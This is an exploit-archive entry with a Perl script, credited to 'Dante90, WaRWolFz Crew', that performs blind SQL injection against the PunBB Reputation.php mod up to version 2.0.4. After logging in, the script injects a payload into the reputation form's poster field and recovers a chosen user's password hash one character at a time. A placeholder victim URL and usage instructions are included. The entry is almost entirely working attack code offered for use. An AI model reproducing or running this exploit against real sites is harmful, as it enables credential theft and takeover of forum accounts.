PunBB Reputation.php Mod <= 2.0.4 Blind SQL Injection Exploit

2009-08-18 / 2009-08-19
Credit: Dante90
Risk: High
Local: No
Remote: Yes

Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

#!/usr/bin/perl #[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit #Coded By Dante90, WaRWolFz Crew #Bug Discovered By: Dante90, WaRWolFz Crew use strict; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; use Time::HiRes; use IO::Socket; my ($UserName,$PassWord,$ID) = @ARGV; if(@ARGV < 3){ &usage(); exit(); } my $Message = ""; my ($Hash,$Time,$Time_Start,$Time_End,$Response); my($Start,$End); my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my $Method = HTTP::Request->new(POST => $Host); my $Cookies = new HTTP::Cookies; my $HTTP = new LWP::UserAgent( agent => 'Mozilla/5.0', max_redirect => 0, cookie_jar => $Cookies, ) or die $!; my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia"; my $DefaultTime = request($Referrer); sub Login(){ my $Login = $HTTP->post($Host.'login.php?action=in', [ form_sent => '1', redirect_url => 'forums.php', req_username => $UserName, req_password => $PassWord, login => 'Login', ]) || die $!; if($Login->content =~ /Logged in successfully./i){ return 1; }else{ return 0; } } if (Login() == 1){ $Message = " * Logged in as: ".$UserName; }elsif (Login() == 0){ $Message = " * Login Failed."; refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1"); print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n"; exit; } sub Blind_SQL_Jnjection{ my ($dec,$hex) = @_; return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*"; } for(my $I=1; $I<=40; $I++){ #N Hash characters for(my $J=0; $J<=15; $J++){ #0 -> F my $Post = $HTTP->post($Host.'reputation.php?',[ form_sent => '1', pid => '2', poster => Blind_SQL_Jnjection($I,$chars[$J]), method => '1', req_message => 'http://www.warwolfz.com/', submit => 'Submit', ]) || die $!; $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); if($Post->content =~ /(The reputation has been successfully changed)/i){ syswrite(STDOUT,chr($chars[$J])); $Hash .= chr($chars[$J]); $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); last; } } if($I == 1 && length $Hash < 1 && !$Hash){ print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n"; exit; } if($I == 40){ print " * Exploit Successed *\n"; print " ------------------------------------------------------\n "; system("pause"); } } sub usage{ system("cls"); { print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [username] [password] [id] *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; exit; } sub request{ $Referrer = $_[0]; $Method->content_type('application/x-www-form-urlencoded'); $Method->content($Referrer); $Start = Time::HiRes::time(); $Response = $HTTP->request($Method); $Response->is_success() or die "$Host : ", $Response->message,"\n"; $End = Time::HiRes::time(); $Time = $End - $Start; return $Time; } sub refresh{ system("cls"); { print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [username] [password] [id] *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; print $_[0] ."\n"; print " * Victime Site: " . $_[1] . "\n"; print " * Default Time: " . $_[2] . " seconds\n"; print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n"; print " * BruteForcing N Char Hash: " . $_[6] . "\n"; print " * SQL Time: " . $_[5] . " seconds\n"; print " * Hash: " . $_[4] . "\n"; } #WaRWolFz Crew



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